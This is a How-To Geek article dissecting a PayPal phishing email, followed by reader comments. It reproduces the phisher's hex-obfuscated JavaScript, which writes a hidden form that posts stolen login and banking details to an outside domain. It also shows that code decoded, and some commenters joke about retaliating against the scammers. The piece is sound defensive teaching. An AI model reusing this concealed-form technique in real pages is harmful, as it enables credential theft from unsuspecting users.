SEARCH

How-To Geek

Online Security: Breaking Down the Anatomy of a Phishing Email


In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.

Don’t think that it’s just your banking details that are important: after all, if someone gains control over your account login they not only know the information contained in that account, but the odds are that same login information may be used on various other accounts. And if they compromise your email account, they can reset all your other passwords.

So in addition to keeping strong and varying passwords, you have to always be on the lookout for bogus emails masquerading as the real thing. While most phishing attempts are amateurish, some are quite convincing so it is important to understand how to recognize them at surface level as well as how they work under the hood.

Image by asirap

Examining What is in Plain Sight

Our example email, like most phishing attempts, “notifies” you of activity on your PayPal account which would, under normal circumstances, be alarming. So the call to action is to verify/restore your account by submitting just about every piece of personal information you can think of. Again, this is pretty formulaic.

While there certainly are exceptions, pretty much every phishing and scam email is loaded with red flags directly in the message themselves. Even if the text is convincing, you can usually find many mistakes littered throughout the message body which indicate the message is not legit.

The Message Body

image

At first glance, this is one of the better phishing emails I have seen. There are no spelling or grammatical mistakes and the verbiage reads according to what you might expect. However, there are a few red flags you can see when you examine the content a bit more closely.

  • “Paypal” – The correct case is “PayPal” (capital P). You can see both variations are used in the message. Companies are very deliberate with their branding, so it is doubtful something like this would pass the proofing process.
  • “allow ActiveX” – How many times have you seen a legit web based business the size of Paypal use a proprietary component which only works on a single browser, especially when they support multiple browsers? Sure, somewhere out there some company does it, but this is a red flag.
  • “securely.” – Notice how this word does not line up in the margin with the rest of the paragraph text. Even if I stretch the window a bit more, it doesn’t wrap or space correctly.
  • “Paypal !” – The space before the exclamation mark looks awkward. Just another quirk which I am sure would not be in a legit email.
  • “PayPal- Account Update Form.pdf.htm” – Why would Paypal attach a “PDF” especially when they could just link to a page on their site? Additionally, why would they try to disguise an HTML file as a PDF? This is the biggest red flag of them all.

The Message Header

image

When you take a look at the message header, a couple of more red flags appear:

  • The from address is test@test.com.
  • The to address is missing. I did not blank this out, it simply isn’t part of the standard message header. Typically a company which has your name will personalize the email to you.

The Attachment

When I open the attachment, you can immediately see the layout is not correct as it is missing style information. Again, why would PayPal email an HTML form when they could simply give you a link on their site?

Note: we used Gmail’s built-in HTML attachment viewer for this, but we’d recommend that you DO NOT OPEN attachments from scammers. Never. Ever. They very often contain exploits that will install trojans on your PC to steal your account info.

image

Scrolling down a bit more you can see that this form asks not only for our PayPal login information, but for banking and credit card information as well. Some of the images are broken.

image

It is obvious this phishing attempt is going after everything with one swoop.

The Technical Breakdown

While it should be pretty clear based on what is in plain sight that this is a phishing attempt, we are now going to break down the technical makeup of the email and see what we can find.

Information from the Attachment

The first thing to take a look at is the HTML source of the attachment form which is what submits the data to the bogus site.

When quickly viewing the source, all the links appear valid as they point to either “paypal.com” or “paypalobjects.com” which are both legit.

image

Now we are going to take a look at some basic page information Firefox gathers on the page.

image

As you can see, some of the graphics are pulled from the domains “blessedtobe.com”, “goodhealthpharmacy.com” and “pic-upload.de” instead of the legit PayPal domains.

image

Information from the Email Headers

Next we will take a look at the raw email message headers. Gmail makes this available via the Show Original menu option on the message.

image

Looking at the header information for the original message, you can see this message was composed using Outlook Express 6. I doubt PayPal has someone on staff which sends each of these messages manually via an outdated email client.

image

Now looking at the routing information, we can see the IP address of both the sender and the relaying mail server.

image

The “User” IP address is original sender. Doing a quick lookup on the IP information, we can see the sending IP is in Germany.

image

And when we look at the relaying mail server’s (mail.itak.at), IP address we can see this is an ISP based in Austria. I doubt PayPal routes their emails directly through an Austria based ISP when they have a massive server farm which could easily handle this task.

image

Where Does the Data Go?

So we have clearly determined this is a phishing email and gathered some information about where the message originated from, but what about where your data is sent?

To see this, we have to first save the HTM attachment do our desktop and open in a text editor. Scrolling through it, everything appears to be in order except when we get to a suspicious looking Javascript block.

image

Breaking out the full source of the last block of Javascript, we see:

<script language=”JavaScript” type=”text/javascript”>
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y);
</script>

Anytime you see a large jumbled string of seemingly random letters and numbers embedded in a Javascript block, it is usually something suspicious. Looking at the code, the variable “x” is set to this large string and then decoded into the variable “y”. The final result of variable “y” is then written to the document as HTML.

Since the large string is made of numbers 0-9 and the letters a-f, it is most likely encoded via a simple ASCII to Hex conversion:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Translates to:

<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>

It is not a coincidence that this decodes into a valid HTML form tag which sends the results not to PayPal, but to a rouge site.

Additionally, when you view the HTML source of the form, you will see that this form tag is not visible because it is generated dynamically via the Javascript. This is a clever way to hide what the HTML is actually doing if someone were to simply view the generated source of the attachment (as we did earlier) as opposed to the opening the attachment directly in a text editor.

image

Running a quick whois on the offending site, we can see this is a domain hosted at a popular web host, 1and1.

image

What stands out is the domain uses a readable name (as opposed to something like “dfh3sjhskjhw.net”) and the domain has been registered for 4 years. Because of this, I believe this domain was hijacked and used as a pawn in this phishing attempt.

Cynicism is a Good Defense

When it comes to staying safe online, it never hurts to have a good bit of cynicism.

While I am sure there are more red flags in the example email, what we have pointed out above are indicators we saw after just a few minutes of examination. Hypothetically, if the surface level of the email mimicked its legitimate counterpart 100%, the technical analysis would still reveal its true nature. This is why is it import to be able to examine both what you can and cannot see.

Jason Faulkner is a developer and IT professional who never has a hot cup of coffee far away. Interact with him on Google+

  • Published 04/13/11

Comments (45)

  1. Alex

    Great article! I particularly enjoyed the part where you uncovered the “rouge” site. (Hint: I think you meant “rogue”).

    But, seriously, excellent article; I learned a few interesting techniques from it.

  2. Scott

    This was a very interesting article with an excellent breakdown. I am curious about the ASCII to HEX conversion of the Javascript. Would it be possible for you to explain how the script does this conversion in a future article?

  3. Richard

    @Scott: It’s quite easy to decode the string yourself. What the code does is take the string and break it down into two character chunks. So 3c666f72 is broken down into 3c 66 6f and 72. These are hexadecimal (base 16) values.

    Now visit http://www.asciitable.com/ and you can see the ASCII character set which lists all the possible characters and then their decimal and hex values. For each two characters, look up the hex value in the table and see what character it returns:

    3c is 60 in decimal and is character <
    66 is 102 in decimal and is character f
    6f is 111 in decimal and is character o
    72 is 114 in decimal and is character r

    You can see the start of the string being created.

    Hope that helps.

  4. zs474

    Thanks sooooo much!!!!
    Very gooooood!!!!!!
    Please keep it up….
    We want more good articles!!!!

  5. Mike

    I’m sure you did it under strict and protected conditions… but dear lord, you downloaded the attachment from a phishing e-mail. At least you threw in the warning to NEVER DO THIS, but I physically cringed in my seat when I got to that part.

  6. Marco Hernandez

    great article and very well explained I had many clients affected by this but always had a hard time explaining how phishing works…

  7. Alphie

    Although a lot of its contents I could not follow, I still found it fascinating. Usually I send thephishing email, along with its headers, to my server which is Suddenlink. However, since I changed from XP to W7, I cannot figure out how to pull up the headers. Hope you can instruct me how to do so.

    I thoroughly enjoy your newsletter, especially the simpler tips. I’m 72 years old and a little late for me to learn all that complicated stuff even though I enjoy reading it. Regards.

    John

  8. D. Frank Robinson

    Anyone know of a site that will accept forwarded suspicious emails for an analysis like this? Or even better an app.

  9. Greg

    Excellent article. This should be sent around to everyone that is non-technical so as to help educate people with the obvious and not so obvious tips.

  10. Elliot

    Great article!
    I think you should mention rule #1.
    NEVER respond to emails asking for personal information.
    No legitimate website will send you an email asking for your passwords.

  11. Dee

    Good article but who has time to decipher all these insipid emails, prolly why they created the DELETE button…

  12. ZenRuth

    If I receive a suspicious email from a company with which I do online business (PayPal, eBay, etc), I go to my browser and log into my account directly. If there is no “hold” on my account, I check my account status. I then email the business from their “contact us” and ask–did you send this email? Once in a while, they confirm that, yes, they sent it. But most times, the answer is no.

    Ruth

  13. dave

    From a technical stand point, interesting and informative. However, I’d much rather read an article on how I can Firebomb these MOFO’s to HELL!! Oh sorry my mask of icy calm slipped there for a second.

  14. Mathew

    Great article thanks for sharing!

    Although i am a web developer something i do as a hobby and have used the internet long enough to know immediately when something is not legitimate, it was a great read and hopefully many people will read this and learn how they can spot a phishing email.

    In reply to Scott and the Richard -
    I won’t post any links but there are many online tools that will encode/decode to save you looking up a list and obviously much quicker.

  15. grillermo

    Very interesting read, but something caught my attention even more, i realized that i only entered the article(from my rss reader) because of the pretty image, it gave the article a very professional look and i realized it was because i thought: they spend so much time writing the article that they felt it the effort justified using a custom made illustration.
    I never saw how powerful this can be until i read this article, that i felt its aimed at spam filters developers.
    P.S. i love this site your content’s quality rocks

  16. grayhoose

    i got this from yahoo: http://www.haltabuse.org/help/headers/index.shtml

    and i send spam to: spam@uce.gov

  17. Steven Torrey

    Many thanks. Just yesterday I received an email about a long lost relative who had $1.6 million in the bank for me to claim. Needless to say, immediate delete. Not so long previous, emails claiming to be from the bank… As always, immediate delete…

    I also noticed the ‘rouge’ when ‘rogue’ was intended.

  18. Burton

    Excellent expository writing and very much appreciated!

  19. John C

    Another thing to point out is that phishing emails may have a link which displays something like http://www.paypal.com. However, when you hover your mouse over the link and look at the actual target address on the status bar, it often shows domains in china or russia.

    As ZenRuth says, I also never log onto any financial sites via a link. I always go directly to the site. I also use trusteer Rapport which was recommended by my bank. It verifiies that you are talking to the real site and blocks keyloggers and any screen captures while you are working on a protected site. If you attempt to type a password on a non-legit site it warns you before you send the page.

  20. Mathew

    I agree Steven,

    Sadly i get such emails everyday. But what i do is this:

    I have an aol email account for sites that i don’t want to give my main email address out to and that is always full of spam and phishing emails. Infact i can gaurantee that i get about 100 emails per day some with attachments that i just delete on AOL mail server, others claiming to be from several banks and poverty scams and the scam you mention.

    I never really get spam in my main email address as i only give it out to people and websites that i know i can trust.

    Also another good little tip if you want to call it that is to add a number or year for example in a new email address, this makes it harder for script buddies and script generators to come up with an email address that not only contains a common word and/or name but also has to have random numbers appended to it.

    It’s a bit like a dictionary attack, that is when a script for example uses a list of common words, usually words in a dictionary hence the name “dictionary attack” and other lists that are shared online like a persons username, names list and they develop such scripts to use these words, names etc append them, add numbers etc to them and have the script to come up with millions of different combinations.

    They then end up with millions of randomly generated emails, usernames, passwords and so on and can use them as they wish for sending out bulk spam, to try and hack peoples accounts online by getting these scripts to submit all these generated details to another sites login form for example and cause a DOS attack.

    All these sort of things usually have something in common on how they work and what they do.

    But thankfully over the past few years it becoming more known now and more people are learning about such things; although i still personally think that we are still way off in educating users who use computers and the internet. Sadly people still fall for these scams and like the old wives tale says “If it sounds to good to be true. A true valid tale that i say to myself often.

    Some scams are harder to notice than others and obviously not everyone will know what they are, what they mean, how one can prevent themselves from such things. like a XSS (Cross Site Scripting) . I could be here all day going on about this matter and many others developers face everyday when building web applications and so on.

  21. Pete Frosio

    Great article!!! Hmmmmm, ……. does anyone have a way to “….. Firebomb these MOFO’s to HELL!!” (Dave above) ? It just might be FUN to take ‘em out, eh?

  22. zs474

    @Pete Frosio
    (Reporting will be a waste of time!!)

    Does anyone have a way to “….. Firebomb these *…*’s??

  23. Paolo

    May be your snapshot of geek art means analytical physiology knowledge of issue but I cannot read this article because I think that e-mail reading and selecting can be a risk that people can avoid just using a good anti-spam, because we usually arrive later than authors of this frauds. We cannot patrol this without falling paranoid and it is easier for a damned hacker to treat newbies trying to be expert!

  24. Eric

    @dave
    Yes please, an article of “Firebombing” would be awesome… or just an article where you do some more research =)

  25. Daryl

    Very nice article, I’m sending this on to everyone I know.
    Thanks

  26. Louis Payton

    Great article. The most obvious thing I noticed to be a red flag was the email was addressed to “Paypal Member”. When I get a valid message from Paypal it is always addressed to me by name. I do have to agree with those wishing for a method of sending a firebomb back to the source.

  27. Hamish51

    Very interesting article. However it would be useful to those creating such ROGUE emails, in order to refine their technique.

  28. astralcyborg

    Great information and very understandable. Thank you.
    It’s scary the thought of someone falling into such a trap, though…

  29. eduboris

    Don’t forget to click the SPAM button in your gmail, they will make sure other people don’t get this email to their inbox but instead to the spam folder!

    you can also report it as phishing by clicking the down arrow near ‘Reply’ and “Report Phishing”

    as far as making sure they get stopped you will have to digg into the details as shown and actually email the hosts abuse portals to report them and they often will disable the accounts associated with the phishing….good article

  30. Santo

    @Jason

    Is there any thing else that needs to be written about phishing? I am sure there is noting left. You had explained every thing about phishing in a detailed way. If someone wants to do a thesis about phishing they should refer this article first.

  31. Rick S

    Great stuff, A lot of people don’t even think about that stuff and they get snagged.
    If I knew computers better I would send them a nasty virus. It may be easier than a firebomb. lol.

    A great retirement hobby would be tracking them down and ramming their heads into the keyboard and using a hammer on their typing fingers. Posting it on youtube would make others think twice.

  32. Ron D

    Another easy way to figure out if something is fishy, is to hover your cursor over the sending address. many times, it will be from paypall.com or something similarly misspelled. Spelling is important, and that is something that many people don’t look for. Of course, this only works in certain email programs, so it might not work in all of them. I forward all suspect emails to the REAL paypal company, or whoever the fisher is trying to imitate. They appreciate the help at catching these dipwads.

  33. Arun G Nair

    The article was excellent.
    U were discussing every single detail and showing us how easy it is to find out such fishing attacks

  34. Adrian

    One of the best articles I’ve seen on the subject and some quality responses too with other things to look out for. Excellent stuff. I do believe though that many regular PC users out there would get bored at the in-depth detail and switch off. However this type of thing should be in the tech curriculum at schools – it’s one thing teaching maths in school but there’s nothing in how to manage your finances in the big wide world, another minefield which is not totally unrelated to this article. Just my four penn’orth (used to be 2d but inflation struck).

  35. Terry46

    Great article. I use Windows Mail and have it set not to automatically open email (Layout/Preview Pane is unchecked). If I get a suspicious one, I right click the email, click Properties and then the tab Details and the button Message Source. If nothing looks familiar or there is no message, I close back to the email and delete it with Shift+Delete. It’s gone without ever having been opened.

  36. BM

    Very meticulously written article on phishing, especially the Javascript decoding part. Excellent piece of work. The easiest way to identify phishing is usually by the grammatical and formatting inconsistencies in the email. Let’s hope those guys never improve on that part because decoding Javascript is not everybody’s cup of tea.

  37. Chris

    Amazing article! ASCII to HEX conversion… that’s brilliant.

  38. Keybored

    still, the best way to defend yourselves from these pesky phishers is to use your common sense.
    just plain common sense and you will be safe.

  39. Chris Yost

    I can’t tell you how long I’ve been waiting for an informative article on how to break down an email like this.
    Thanks!!

    Oh, it’s not “import” to be able to examine both what you can and cannot see, but it *is* “importANT” ;)

  40. remoran

    It’s a 10!!! :)

  41. Daniel D'Laine

    Yep, great article. The only trouble is – finding the time to go through all the checks to find the senders. Sometimes I just can’t help myself though if it’s a really good fake and I use an old address to send varying replies, but these do no good. You don’t even upset these types of trashy scamsters. They do what you should be doing… deleting the email before it does any damage! ‘Spamitback’ is an interesting app, you should check it out Dave!

  42. Jon

    Excellent article, I especially liked the breakdown of the mail and how you were able to show the various components. Which will come into great use in the future.

  43. wschloss

    Most legitimate sites have a “security page” or at least email to which such can be forwarded so they can take action to protect both themselves and their clients/customers. Here is PayPal’s: https://www.paypal-search.com/socialsearch/query

    When something like this is received users should spend 10 minutes to follow-up for their own sake and that of the community. The internet comes with both rights AND responsibilities. Not taking that extra step is the equivalent of witnessing an attempted purse snatching, and doing absolutely nothing!

  44. belle lomita

    Is there a way to rid a Phising address in the tool bar? The bar at the top of the browser?

  45. belle lomita

    Is there a way to permanently remove a Phishing site from a tool bar at the top of the browser? Thank you.

Enter Your Email Here to Get Access for Free:

Go check your email!